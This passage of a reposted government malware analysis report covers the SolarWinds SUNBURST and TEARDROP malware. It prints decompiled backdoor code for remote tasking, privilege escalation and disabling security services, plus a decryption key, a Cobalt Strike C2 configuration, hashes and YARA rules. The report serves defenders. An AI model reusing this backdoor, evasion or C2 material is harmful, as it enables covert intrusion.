The “ExecuteEngine” is a core function that uses the “job” variable to carry out certain tasks for the adversary. This function has the ability to run tasks that could consist of command line arguments, alter the registry (to maintain persistence, etc.), collect a detailed description of the target platform, kill tasks, delete files, add files, or even execute a secondary payload:

–Begin ExecuteEngine Function–
private int ExecuteEngine(
       OrionImprovementBusinessLayer.HttpHelper.JobEngine job,
       string cl,
       out string result)
    {
       result = (string) null;
       int num = 0;
       string[] args = OrionImprovementBusinessLayer.Job.SplitString(cl);
       try
       {
        if (job == OrionImprovementBusinessLayer.HttpHelper.JobEngine.ReadRegistryValue || job == OrionImprovementBusinessLayer.HttpHelper.JobEngine.SetRegistryValue || (job == OrionImprovementBusinessLayer.HttpHelper.JobEngine.DeleteRegistryValue || job == OrionImprovementBusinessLayer.HttpHelper.JobEngine.GetRegistrySubKeyAndValueNames))
           num = OrionImprovementBusinessLayer.HttpHelper.AddRegistryExecutionEngine(job, args, out result);
        switch (job)
        {
           case OrionImprovementBusinessLayer.HttpHelper.JobEngine.SetTime:
            int delay;
            OrionImprovementBusinessLayer.Job.SetTime(args, out delay);
            this.delay = delay;
            break;
           case OrionImprovementBusinessLayer.HttpHelper.JobEngine.CollectSystemDescription:
            OrionImprovementBusinessLayer.Job.CollectSystemDescription(this.proxy.ToString(), out result);
            break;
           case OrionImprovementBusinessLayer.HttpHelper.JobEngine.UploadSystemDescription:
            OrionImprovementBusinessLayer.Job.UploadSystemDescription(args, out result, this.proxy.GetWebProxy());
            break;
           case OrionImprovementBusinessLayer.HttpHelper.JobEngine.RunTask:
            num = OrionImprovementBusinessLayer.Job.RunTask(args, cl, out result);
            break;
           case OrionImprovementBusinessLayer.HttpHelper.JobEngine.GetProcessByDescription:
            OrionImprovementBusinessLayer.Job.GetProcessByDescription(args, out result);
            break;
           case OrionImprovementBusinessLayer.HttpHelper.JobEngine.KillTask:
            OrionImprovementBusinessLayer.Job.KillTask(args);
            break;
        }
        return job == OrionImprovementBusinessLayer.HttpHelper.JobEngine.WriteFile || job == OrionImprovementBusinessLayer.HttpHelper.JobEngine.FileExists || (job == OrionImprovementBusinessLayer.HttpHelper.JobEngine.DeleteFile || job == OrionImprovementBusinessLayer.HttpHelper.JobEngine.GetFileHash) || job == OrionImprovementBusinessLayer.HttpHelper.JobEngine.GetFileSystemEntries ? OrionImprovementBusinessLayer.HttpHelper.AddFileExecutionEngine(job, args, out result) : num;
       }
       catch (Exception ex)
       {
        if (!string.IsNullOrEmpty(result))
           result += “n”;
        result += ex.Message;
        return ex.HResult;
       }
–End ExecuteEngine function–

**TERMINATE PROCESSES**
    public static void KillTask(string[] args) =&gt;
Process.GetProcessById(int.Parse(args[0])).Kill();

**DELETE FILE**
    public static void DeleteFile(string[] args) =&gt; System.IO.File.Delete(Environment.ExpandEnvironmentVariables(args[0]));

**COMPUTE FILE HASHES**
    public static int GetFileHash(string[] args, out string result)
    {
       result = (string) null;
       string path = Environment.ExpandEnvironmentVariables(args[0]);
       using (MD5 md5 = MD5.Create())
       {
        using (FileStream fileStream = System.IO.File.OpenRead(path))
        {
           byte[] hash = md5.ComputeHash((Stream) fileStream);
           if (args.Length &gt; 1)
            return !(OrionImprovementBusinessLayer.ByteArrayToHexString(hash).ToLower() == args[1].ToLower()) ? 1 : 0;
           result = OrionImprovementBusinessLayer.ByteArrayToHexString(hash);
        }
       }
       return 0;
    }

**REBOOT SYSTEM**
public static bool RebootComputer()
    {
       bool flag = false;
       try
       {
        bool previousState = false;
        string privilege = OrionImprovementBusinessLayer.ZipHelper.Unzip(ph2eifo3n5utg1j8d94qrvbmk0sal76c);
        if (!OrionImprovementBusinessLayer.NativeMethods.SetProcessPrivilege(privilege, true, out previousState))
           return flag;
        flag = OrionImprovementBusinessLayer.NativeMethods.InitiateSystemShutdownEx((string) null, (string) null, 0U, true, true, 2147745794U);
        OrionImprovementBusinessLayer.NativeMethods.SetProcessPrivilege(privilege, previousState, out previousState);
        return flag;
       }
       catch (Exception ex)
       {
        return flag;
       }
    }
–End additional functions Function–

**ADJUST PROCESS PRIVILEGES**
The SetProcessPrivilege function is used to adjust privileges for a target process on the victim system. For example, a process may need increased system level privileges to accomplish its designed task.

–Begin SetProcessPrivilege Function–
public static bool SetProcessPrivilege(
       string privilege,
       bool newState,
       out bool previousState)
    {
       bool flag = false;
       previousState = false;
       try
       {
        IntPtr zero = IntPtr.Zero;
        OrionImprovementBusinessLayer.NativeMethods.LUID Luid = new OrionImprovementBusinessLayer.NativeMethods.LUID();
        Luid.LowPart = 0U;
        Luid.HighPart = 0U;
        if (!OrionImprovementBusinessLayer.NativeMethods.OpenProcessToken(OrionImprovementBusinessLayer.NativeMethods.GetCurrentProcess(), TokenAccessLevels.Query | TokenAccessLevels.AdjustPrivileges, ref zero))
           return false;
        if (!OrionImprovementBusinessLayer.NativeMethods.LookupPrivilegeValue((string) null, privilege, ref Luid))
        {
           OrionImprovementBusinessLayer.NativeMethods.CloseHandle(zero);
           return false;
        }
        OrionImprovementBusinessLayer.NativeMethods.TOKEN_PRIVILEGE NewState = new OrionImprovementBusinessLayer.NativeMethods.TOKEN_PRIVILEGE();
        OrionImprovementBusinessLayer.NativeMethods.TOKEN_PRIVILEGE PreviousState = new OrionImprovementBusinessLayer.NativeMethods.TOKEN_PRIVILEGE();
        NewState.PrivilegeCount = 1U;
        NewState.Privilege.Luid = Luid;
        NewState.Privilege.Attributes = newState ? 2U : 0U;
        uint ReturnLength = 0;
        OrionImprovementBusinessLayer.NativeMethods.AdjustTokenPrivileges(zero, false, ref NewState, (uint) Marshal.SizeOf((object) PreviousState), ref PreviousState, ref ReturnLength);
        previousState = (PreviousState.Privilege.Attributes &amp; 2U) &gt; 0U;
        flag = true;
        OrionImprovementBusinessLayer.NativeMethods.CloseHandle(zero);
        return flag;
       }
       catch (Exception ex)
       {
        return flag;
       }
    }

    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    private struct LUID
    {
       public uint LowPart;
       public uint HighPart;
    }

    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    private struct LUID_AND_ATTRIBUTES
    {
       public OrionImprovementBusinessLayer.NativeMethods.LUID Luid;
       public uint Attributes;
    }

    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    private struct TOKEN_PRIVILEGE
    {
       public uint PrivilegeCount;
       public OrionImprovementBusinessLayer.NativeMethods.LUID_AND_ATTRIBUTES Privilege;
    }
   }
–End SetProcessPrivilege Function–

**BLOCK LIST CHECKING FUNCTIONS**
The Update function is critical to starting the SUNBURST C2 functionality. Early in its execution, the Update function calls the UpdateNotification() function. If that returns a “False”, indicating one of the hard-coded block list processes is running, the SUNBURST malware will not initiate its C2 session. The malicious class “OrionImprovementBusinessLayer”, containing the SUNBURST module, will effectively be disabled. However, the parent SolarWinds process running the malicious DLL 32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77 will not be interrupted.

–Begin Update Function–
   private static void Update()
   {
    bool flag1 = false;
    OrionImprovementBusinessLayer.CryptoHelper cryptoHelper = new OrionImprovementBusinessLayer.CryptoHelper(OrionImprovementBusinessLayer.userId, OrionImprovementBusinessLayer.domain4);
    OrionImprovementBusinessLayer.HttpHelper http = (OrionImprovementBusinessLayer.HttpHelper) null;
    Thread thread = (Thread) null;
    bool last = true;
    OrionImprovementBusinessLayer.AddressFamilyEx addressFamilyEx = OrionImprovementBusinessLayer.AddressFamilyEx.Unknown;
    int num1 = 0;
    bool flag2 = true;
    OrionImprovementBusinessLayer.DnsRecords rec = new OrionImprovementBusinessLayer.DnsRecords();
    Random random = new Random();
    int num2 = 0;
    if (!OrionImprovementBusinessLayer.UpdateNotification())
       return;
    OrionImprovementBusinessLayer.svcListModified2 = false;
    for (int index = 1; index &lt;= 3 &amp;&amp; !flag1; ++index)
    {
       OrionImprovementBusinessLayer.DelayMin(rec.A, rec.A);
       if (!OrionImprovementBusinessLayer.ProcessTracker.TrackProcesses(true))
       {
        if (OrionImprovementBusinessLayer.svcListModified1)
           flag2 = true;
        num1 = OrionImprovementBusinessLayer.svcListModified2 ? num1 + 1 : 0;
        string hostName;
        switch (OrionImprovementBusinessLayer.status)
        {
           case OrionImprovementBusinessLayer.ReportStatus.New:
            hostName = addressFamilyEx == OrionImprovementBusinessLayer.AddressFamilyEx.Error ? cryptoHelper.GetCurrentString() : cryptoHelper.GetPreviousString(out last);
            break;
           case OrionImprovementBusinessLayer.ReportStatus.Append:
            hostName = flag2 ? cryptoHelper.GetNextStringEx(rec.dnssec) : cryptoHelper.GetNextString(rec.dnssec);
            break;
           default:
            goto label_27;
        }
–End Update Function–

The UpdateNotification() function will return a “False” if any process on the hard coded blocklist is running on the target system. It utilizes the TrackProcess function detailed below. It call the TrackProcesses function.

–Begin UpdateNotification Function–
private static bool UpdateNotification()
   {
    int num = 3;
    while (num– &gt; 0)
    {
       OrionImprovementBusinessLayer.DelayMin(0, 0);
       if (OrionImprovementBusinessLayer.ProcessTracker.TrackProcesses(true))
        return false;
       if (OrionImprovementBusinessLayer.DnsHelper.CheckServerConnection(OrionImprovementBusinessLayer.apiHost))
        return true;
    }
    return false;
   }
–End UpdateNotification Function–

The “TrackProcesses” function queries a list of running processes on the target system and then passes the process names to the “SearchAssemblies” function, which hashes their process names and compares the result hashes to the hard-coded process hash list stored in the list “assemblyTimeStamps.” If any of the target processes are running, the function will return True. It also searches for certain services and attempts to disable them.

–Begin TrackProcesses Function–
public static bool TrackProcesses(bool full)
    {
       Process[] processes = Process.GetProcesses();
       if (OrionImprovementBusinessLayer.ProcessTracker.SearchAssemblies(processes))
        return true;
       bool flag = OrionImprovementBusinessLayer.ProcessTracker.SearchServices(processes);
       return !flag &amp; full ? OrionImprovementBusinessLayer.ProcessTracker.SearchConfigurations() : flag;
    }
–End TrackProcesses Function–

The “SearchAssemblies” function called by TrackProcesses, is used to enumerate running processes to determine if any of the hashed processes, included within the process blocklist are currently running on the target system.

–Begin SearchAssemblies Function—
private static bool SearchAssemblies(Process[] processes)
    {
       for (int index = 0; index &lt; processes.Length; ++index)
       {
        ulong hash = OrionImprovementBusinessLayer.GetHash(processes[index].ProcessName.ToLower());
        if (Array.IndexOf&lt;ulong&gt;(OrionImprovementBusinessLayer.assemblyTimeStamps, hash) != -1)
           return true;
       }
       return false;

    }
–End SearchAssemblies Function–

The SearchServices” function, called by TrackProcesses, searches running services to determine whether or not they are running any of the hard-coded block list target process hashes. It attempts to disable these services.

–Begin SearchServices Function–
private static bool SearchServices(Process[] processes)
    {
       for (int index = 0; index &lt; processes.Length; ++index)
       {
        ulong hash = OrionImprovementBusinessLayer.GetHash(processes[index].ProcessName.ToLower());
        foreach (OrionImprovementBusinessLayer.ServiceConfiguration svc in OrionImprovementBusinessLayer.svcList)
        {
           if (Array.IndexOf&lt;ulong&gt;(svc.timeStamps, hash) != -1)
           {
            object obj = OrionImprovementBusinessLayer.ProcessTracker._lock;
            bool flag = false;
            try
            {
               Monitor.Enter(obj, ref flag);
               if (!svc.running)
               {
                OrionImprovementBusinessLayer.svcListModified1 = true;
                OrionImprovementBusinessLayer.svcListModified2 = true;
                svc.running = true;
               }
               if (!svc.disabled)
               {
                if (!svc.stopped)
                {
                   if (svc.Svc.Length != 0)
                   {
                    OrionImprovementBusinessLayer.DelayMin(0, 0);
                    OrionImprovementBusinessLayer.ProcessTracker.SetManualMode(svc.Svc);
                    svc.disabled = true;
                    svc.stopped = true;
                   }
                }
               }
            }
            finally
            {
               if (flag)
                Monitor.Exit(obj);
            }
–End SearchServices Function–

Screenshots

Figure 1 - The modified module with a new class function named "OrionImprovementBusinessLayer."

Figure 1 – The modified module with a new class function named “OrionImprovementBusinessLayer.”

Figure 2 - The code snippet contains the subdomains and other strings used to construct the C2 domains.

Figure 2 – The code snippet contains the subdomains and other strings used to construct the C2 domains.

MAR-10318845-1.v1 – SUNBURST

MAR-10320115-1.v1 – TEARDROP

This article is contributed. See the original author and article here.

Malware Analysis Report

10320115.r1.v1

2021-02-05

Notification

This report is provided “as is” for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE–Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Summary

Description

This report provides detailed analysis of malicious artifacts associated with a sophisticated supply chain compromise of Solar Winds Orion network management software, identified by the security company FireEye as TEARDROP.

TEARDROP is a loader designed to decrypt and execute an embedded payload on the target system. The payload has been identified as the Cobalt Strike Beacon Implant (Version 4) and provides a remote operator command and control capabilities over a victim system through an encrypted network tunnel. The capabilities include the ability to rapidly exfiltrate data, log keystrokes, take screenshots, and deploy additional payloads.

For a downloadable copy of IOCs, see: MAR-10320115-1.v1.stix.

Submitted Files (2)

1817a5bf9c01035bcf8a975c9f1d94b0ce7f6a200339485d8f93859f8f6d730c (1817a5bf9c01035bcf8a975c9f1d94…)

b820e8a2057112d0ed73bd7995201dbed79a79e13c79d4bdad81a22f12387e07 (b820e8a2057112d0ed73bd7995201d…)

Domains (2)

ervsystem.com

infinitysoftwares.com

Findings

1817a5bf9c01035bcf8a975c9f1d94b0ce7f6a200339485d8f93859f8f6d730c

Tags

backdoordroppertrojan

Details
Name 1817a5bf9c01035bcf8a975c9f1d94b0ce7f6a200339485d8f93859f8f6d730c
Size 321024 bytes
Type PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
MD5 35abfb98dac5bf48f7ac0e67afc9bdb7
SHA1 9185029c2630b220a74620c8f3d04886a457e1cf
SHA256 1817a5bf9c01035bcf8a975c9f1d94b0ce7f6a200339485d8f93859f8f6d730c
SHA512 93f1336e3bc7ac01561f0ad7ce5fec7ae078e55db0f5b0cf0663cb5dbbe2acb08f27490da179e27579debc04843bf02f047456c516bf0345ba827e0efe85149a
ssdeep 6144:NQGxkGwaxIOkqNQI7LI8L/pOXlZg2gv+rtcOHNManxm2wf:NtxpgyNQIo8LePWOHWgTa
Entropy 7.922861
Antivirus
BitDefender Generic.Teardrop.1.244AC43A
Clamav Win.Dropper.Teardrop-9808996-3
Emsisoft Generic.Teardrop.1.244AC43A (B)
Lavasoft Generic.Teardrop.1.244AC43A
Microsoft Security Essentials Trojan:Win64/Cobaltstrike.RN!dha
Symantec Backdoor.Teardrop
YARA Rules
  • rule CISA_10320115_01 : TEARDROP trojan backdoor
    {
       meta:
           Author = “CISA Code & Media Analysis”
           Incident = “10320115”
           Date = “2020-12-31”
           Last_Modified = “20201231_1800”
           Actor = “n/a”
           Category = “Trojan Backdoor”
           Family = “TEARDROP”
           Description = “Detects variants of TEARDROP malware”
           MD5_1 = “f612bce839d855bbff98214a197489f7”
           SHA256_1 = “dc20f4e50784533d7d10925e4b056f589cc73c139e97f40c0b7969728a28125c”
           MD5_2 = “91e47c7bc9a7809e6b1560e34f2d6d7e”
           SHA256_2 = “b37007db21a7f969d2c838f3bbbeb78a7402d66735bb5845ef31df9048cc33f0”
           MD5_3 = “91e47c7bc9a7809e6b1560e34f2d6d7e”
           SHA256_3 = “1817a5bf9c01035bcf8a975c9f1d94b0ce7f6a200339485d8f93859f8f6d730c”    
       strings:
           $s0 = { 65 23 FB 7F 20 AA EB 0C B8 16 F6 BC 2F 4D D4 C4 39 97 C7 23 9F 3E 5C DE }
           $s1 = { 5C E6 06 63 FA DE 44 C0 D4 67 95 28 12 47 C5 B5 EF 24 BC E4 }
           $s2 = { 9E 96 BA 1B FB 7F 19 5A 8C 06 AB FA 43 3B F0 83 9E 54 0B 02 }
           $s3 = { C2 7E 93 FC 02 B9 C6 DE 2B AF C6 C2 BE 2C 88 02 B4 1D 03 F5 }
           $s4 = { 48 B8 53 4F 46 54 57 41 52 45 C7 44 24 60 66 74 5C 43 C6 44 24 66 00 48 89 44 24 50 48 B8 5C 4D 69 63 72 6F 73 6F }
           $s5 = { 48 83 F8 FF 48 8D }
           $s6 = { 8B 0A 48 83 C2 04 8D 81 FF FE FE FE F7 D1 21 C8 25 80 80 80 80 }
           $s7 = { 5B 5E 5F 5D 41 5C 41 }
           $s8 = { 4E 00 65 00 74 00 77 00 6F 00 72 00 6B 00 20 00 53 00 65 00 74 00 75 00 70 00 20 00 53 00 65 00 72 00 76 00 69 00 63 00 65 }
           $s9 = { 64 6C 6C 00 4E 65 74 53 65 74 75 70 53 65 72 76 69 63 65 4D 61 69 6E }
           $s10 = { 41 31 C0 45 88 04 0A 48 83 C1 01 45 89 C8 41 39 CB 7F }
       condition:
           ($s0 or $s1 or $s2 or $s3) or ($s4 and $s5 and $s6 and $s7 and $s8 and $s9 and $s10)
    }
  • rule FireEye_20_00025665_01 : TEARDROP APT dropper
    {
       meta:
           Author = “FireEye”
           Date = “2020-12-13”
           Last_Modified = “20201213_1916”
           Actor = “n/a”
           Category = “Hacktool”
           Family = “TEARDROP”
           Description = “This rule looks for portions of the TEARDROP backdoor that are vital to how it functions. TEARDROP is a memory only dropper that can read files and registry keys, XOR decode an embedded payload, and load the payload into memory. TEARDROP persists as a Windows service and has been observed dropping Cobalt Strike BEACON into memory.”
           MD5_1 = “”
           SHA256_1 = “”
       strings:
           $sb1 = { C7 44 24 ?? 80 00 00 00 [0-64] BA 00 00 00 80 [0-32] 48 8D 0D [4-32] FF 15 [4] 48 83 F8 FF [2-64] 41 B8 40 00 00 00 [0-64] FF 15 [4-5] 85 C0 7? ?? 80 3D [4] FF }
           $sb2 = { 80 3D [4] D8 [2-32] 41 B8 04 00 00 00 [0-32] C7 44 24 ?? 4A 46 49 46 [0-32] E8 [4-5] 85 C0 [2-32] C6 05 [4] 6A C6 05 [4] 70 C6 05 [4] 65 C6 05 [4] 67 }
           $sb3 = { BA [4] 48 89 ?? E8 [4] 41 B8 [4] 48 89 ?? 48 89 ?? E8 [4] 85 C0 7? [1-32] 8B 44 24 ?? 48 8B ?? 24 [1-16] 48 01 C8 [0-32] FF D0 }
       condition:
           all of them
    }
  • rule FireEye_20_00025665_02 : TEARDROP APT dropper
    {
       meta:
           Author = “FireEye”
           Date = “2020-12-13”
           Last_Modified = “20201213_1916”
           Actor = “n/a”
           Category = “Hacktool”
           Family = “TEARDROP”
           Description = “This rule is intended match specific sequences of opcode found within TEARDROP, including those that decode the embedded payload. TEARDROP is a memory only dropper that can read files and registry keys, XOR decode an embedded payload, and load the payload into memory. TEARDROP persists as a Windows service and has been observed dropping Cobalt Strike BEACON into memory.”
           MD5_1 = “”
           SHA256_1 = “”
       strings:
           $loc_4218FE24A5 = { 48 89 C8 45 0F B6 4C 0A 30 }
           $loc_4218FE36CA = { 48 C1 E0 04 83 C3 01 48 01 E8 8B 48 28 8B 50 30 44 8B 40 2C 48 01 F1 4C 01 FA }
           $loc_4218FE2747 = { C6 05 ?? ?? ?? ?? 6A C6 05 ?? ?? ?? ?? 70 C6 05 ?? ?? ?? ?? 65 C6 05 ?? ?? ?? ?? 67 }
           $loc_5551D725A0 = { 48 89 C8 45 0F B6 4C 0A 30 48 89 CE 44 89 CF 48 F7 E3 48 C1 EA 05 48 8D 04 92 48 8D 04 42 48 C1 E0 04 48 29 C6 }
           $loc_5551D726F6 = { 53 4F 46 54 57 41 52 45 ?? ?? ?? ?? 66 74 5C 43 ?? ?? ?? ?? 00 }
       condition:
           (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them
    }
ssdeep Matches

No matches found.

PE Metadata
Compile Date 2018-12-09 10:37:58-05:00
Import Hash 0a331624686ac9055694d7ddd9c0815d
Company Name None
File Description Network Setup Service
Internal Name None
Legal Copyright © Microsoft Corporation. All rights reserved.
Original Filename NETSETUPSVC.DLL
Product Name Microsoft® Windows® Operating System
Product Version 10.0.14393.0
PE Sections
MD5 Name Raw Size Entropy
d990149684ac611b98b9d389766a7e17 header 1024 2.584189
5fbd9948fd72f083803635022111fd99 .text 23552 6.358535
122bd1d155ed0c51226ea0b38872e13d .data 286720 7.998098
9d8aead5ec18fa55740a34a7eaa3c2bb .rdata 1536 3.673323
7b5aab64a2810cf05bd80323f8aa17d4 .pdata 1536 3.660221
8b15f6849b0bf0f60bd81b23988f5ca7 .xdata 1024 2.883941
d41d8cd98f00b204e9800998ecf8427e .bss 0 0.000000
091c8665b4cd95cc583105c223f156aa .edata 512 0.967748
c94c470079ed994735caebed176cd925 .idata 2560 4.429320
c806ece4d1aa4e25beb529c6e7dc947d .CRT 512 0.253231
9f168cc07fa95e573b1f74a2e4614f79 .tls 512 0.331828
5b06dd2d5de3cb635e5e15313a541789 .rsrc 1024 2.933337
99450283e3e0c313f697d0165f585598 .reloc 512 1.239038
Relationships
1817a5bf9c… Connected_To ervsystem.com
Description

This file is a malicious 64-bit DLL, identified as a variant of the TEARDROP loader. The malware attempts to read the first 64-bytes of a file named “festive_computer.jpg” (Figure 1). It does not utilize the data it reads from this file and it will continue executing even if this file is not present on the target system.

After attempting to read the file “festive_computer.jpg,” it will decrypt and execute an embedded code buffer using an XOR based stream cipher (Figure 2). Below is the key utilized by the cipher algorithm to decrypt the embedded code buffer:

—Begin Cipher Key—
C27E93FC02B9C6DE2BAFC6C2BE2C8802B41D03F53365B25AEE1A67D0E9525171F5F7149045E5D1F672176CA686C3C7A0D34E5FF1FBCBF6C14C4BEE2867A296DDE199179CB4D4CC93EA4DFB75510AB9F531EDCCA291B74C7FAA9D7156A97F359B6E68D9EA2D77E646654D3533D8A135A1E604FE6A55EE72B4543A7F331B473A9B7D14765D01DF7ACC0370894DE2530F8FDB51066AE70B0D462A15
—End Cipher Key—

The embedded code buffer has been identified as the Cobalt Strike Beacon (version 4) Remote Access Tool (RAT). Displayed below is the embedded Beacon configuration data:

—Begin Cobalt Beacon Configuration Data—
Port                             – 443
SleepTime                 – 7200000
MaxGetSize                – 1399696
Jitter                            – 18
MaxDNS                     – 255
C2Server                     – ervsystem.com/2019/Two-Man-Point-The-Brands/
UserAgent                    – Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; rv:11.0) like Gecko
HttpPostUri                 – /2019/Users-Case-Documentation-And-Yourselt/
Malleable_C2_Instructions        – Remove 38 bytes from the end
                                Remove 1554 bytes from the beginning
                                Base64 decode
HttpGet_Metadata                 – Referer: https://yahoo.com/
                                Host: ervsystem.com
                                Accept: */*
                                Accept-Language: en-US
                                Accept-Encoding: gzip, deflate
                                Connection: close
                                PHPSESSID=
                                Cookie
HttpPost_Metadata                – Referer: https://yahoo.com/
                                Host: ervsystem.com
                                Accept: */*
                                Accept-Language: en-US
                                Connection: close
                                name=”uploaded_1″;filename=”04373.avi”
Content-Type: text/plain

                                p
SpawnTo                         – b’x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00′
PipeName                         –
DNS_Idle                         – 9.9.9.9
DNS_Sleep                        – 0
SSH_Host                         – Not Found
SSH_Port                         – Not Found
SSH_Username                 – Not Found
SSH_Password_Plaintext     – Not Found
SSH_Password_Pubkey         – Not Found
HttpGet_Verb                     – GET
HttpPost_Verb                    – POST
HttpPostChunk                    – 0
Spawnto_x86                     – %windir%syswow64msiexec.exe
Spawnto_x64                     – %windir%sysnativeprint.exe
CryptoScheme                     – 0
Proxy_Config                     – Not Found
Proxy_User                     – Not Found
Proxy_Password                 – Not Found
Proxy_Behavior                 – Use IE settings
Watermark                        – 892810033
bStageCleanup                    – True
bCFGCaution                     – False
KillDate                         – 0
bProcInject_StartRWX             – False
bProcInject_UseRWX             – False
bProcInject_MinAllocSize         – 7281
ProcInject_PrependAppend_x86     – b’x90′
                                Empty
ProcInject_PrependAppend_x64     – b’x90x90x90′
                                Empty
ProcInject_Execute             – ntdll:RtlUserThreadStart
                                CreateThread
                                NtQueueApcThread
                                SetThreadContext
ProcInject_AllocationMethod     – NtMapViewOfSection
bUsesCookies                     – True
HostHeader                     –
—End Cobalt Beacon Configuration Data—

Screenshots

Figure 1 - Screenshot of the code structure that tries to read "festive_computer.jpg" from disk.

Figure 1 – Screenshot of the code structure that tries to read “festive_computer.jpg” from disk.

Figure 2 - Screenshot of TEARDROP using an algorithm to decrypt the embedded code buffer which contains the Cobalt Strike Beacon remote access tool (RAT).

Figure 2 – Screenshot of TEARDROP using an algorithm to decrypt the embedded code buffer which contains the Cobalt Strike Beacon remote access tool (RAT).

ervsystem.com

Tags

command-and-control

URLs
  • ervsystem.com/2019/Two-Man-Point-The-Brands/
Ports
Whois

Domain Name: ERVSYSTEM.COM
Registry Domain ID: 2222911627_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.epik.com
Registrar URL: http://www.epik.com
Updated Date: 2020-09-04T23:23:29Z
Creation Date: 2018-02-04T08:45:05Z
Registrar Registration Expiration Date: 2022-02-04T08:45:05Z
Registrar: Epik, Inc.
Registrar IANA ID: 617
Registrar Abuse Contact Email: abuse@epik.com
Registrar Abuse Contact Phone: +1.4253668810
Reseller:
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Privacy Administrator
Registrant Organization: Anonymize, Inc.
Registrant Street: 704 228th Ave NE
Registrant City: Sammamish
Registrant State/Province: WA
Registrant Postal Code: 98074
Registrant Country: US
Registrant Phone: +1.4253668810
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: ervsystem.com@anonymize.com
Registry Admin ID:
Admin Name: Privacy Administrator
Admin Organization: Anonymize, Inc.
Admin Street: 704 228th Ave NE
Admin City: Sammamish
Admin State/Province: WA
Admin Postal Code: 98074
Admin Country: US
Admin Phone: +1.4253668810
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: ervsystem.com@anonymize.com
Registry Tech ID:
Tech Name: Privacy Administrator
Tech Organization: Anonymize, Inc.
Tech Street: 704 228th Ave NE
Tech City: Sammamish
Tech State/Province: WA
Tech Postal Code: 98074
Tech Country: US
Tech Phone: +1.4253668810
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: ervsystem.com@anonymize.com
Name Server: NS3.EPIK.COM
Name Server: NS4.EPIK.COM
DNSSEC: signedDelegation
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/

Relationships
ervsystem.com Connected_From 1817a5bf9c01035bcf8a975c9f1d94b0ce7f6a200339485d8f93859f8f6d730c
Description

This domain is the command and control (C2) for the sample “1817a5bf9c01035bcf8a975c9f1d94b0ce7f6a200339485d8f93859f8f6d730c.”

b820e8a2057112d0ed73bd7995201dbed79a79e13c79d4bdad81a22f12387e07

Tags

backdoortrojan

Details
Name b820e8a2057112d0ed73bd7995201dbed79a79e13c79d4bdad81a22f12387e07
Size 530432 bytes
Type PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
MD5 bd842c41b4c1b3c2deb475d7a3876599
SHA1 f7e61eb028b399b74c73883a2fccedbe56ecea2e
SHA256 b820e8a2057112d0ed73bd7995201dbed79a79e13c79d4bdad81a22f12387e07
SHA512 110a10662342b0d5716c3307c51fa8a591bf621049d8d291aa44f8ab864ab075064651750334619292e9362136e328c14dd637033c244d42551ac5b321941aad
ssdeep 12288:NMINVoXxVuxcowWRjZ9dpOLg8UU8YhUhKEcBvg+:2rxIwU19eL4oUAEun
Entropy 7.533146
Antivirus
BitDefender Trojan.Teardrop.C
ESET a variant of Generik.NFGRBKQ trojan
Emsisoft Trojan.Teardrop.C (B)
Lavasoft Trojan.Teardrop.C
Microsoft Security Essentials Trojan:Win64/Cobaltstrike.RN!dha
Symantec Backdoor.Teardrop
YARA Rules
  • rule FireEye_20_00025665_02 : TEARDROP APT dropper
    {
       meta:
           Author = “FireEye”
           Date = “2020-12-13”
           Last_Modified = “20201213_1916”
           Actor = “n/a”
           Category = “Hacktool”
           Family = “TEARDROP”
           Description = “This rule is intended match specific sequences of opcode found within TEARDROP, including those that decode the embedded payload. TEARDROP is a memory only dropper that can read files and registry keys, XOR decode an embedded payload, and load the payload into memory. TEARDROP persists as a Windows service and has been observed dropping Cobalt Strike BEACON into memory.”
           MD5_1 = “”
           SHA256_1 = “”
       strings:
           $loc_4218FE24A5 = { 48 89 C8 45 0F B6 4C 0A 30 }
           $loc_4218FE36CA = { 48 C1 E0 04 83 C3 01 48 01 E8 8B 48 28 8B 50 30 44 8B 40 2C 48 01 F1 4C 01 FA }
           $loc_4218FE2747 = { C6 05 ?? ?? ?? ?? 6A C6 05 ?? ?? ?? ?? 70 C6 05 ?? ?? ?? ?? 65 C6 05 ?? ?? ?? ?? 67 }
           $loc_5551D725A0 = { 48 89 C8 45 0F B6 4C 0A 30 48 89 CE 44 89 CF 48 F7 E3 48 C1 EA 05 48 8D 04 92 48 8D 04 42 48 C1 E0 04 48 29 C6 }
           $loc_5551D726F6 = { 53 4F 46 54 57 41 52 45 ?? ?? ?? ?? 66 74 5C 43 ?? ?? ?? ?? 00 }
       condition:
           (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them
    }
ssdeep Matches

No matches found.

PE Metadata
Compile Date 2018-03-09 23:23:43-05:00
Import Hash 3417123af2f473f771d46841bfce6d48
Company Name None
File Description GetText: library and tools for native language support
Internal Name None
Legal Copyright © 2015 Free Software Foundation <www.fsf.org>
Original Filename libintl3.dll
Product Name libintl3.dll
Product Version 0.14.4.1952
PE Sections
MD5 Name Raw Size Entropy
1ae8ec5795f9a3cad5d54e569634d668 header 1024 2.703747
989e04fb5dc1eb83a3055a3fea30fb7a .text 209408 6.327319
d2bcd776a8ca1ed76feb8344d0739f1a .data 286720 7.998501
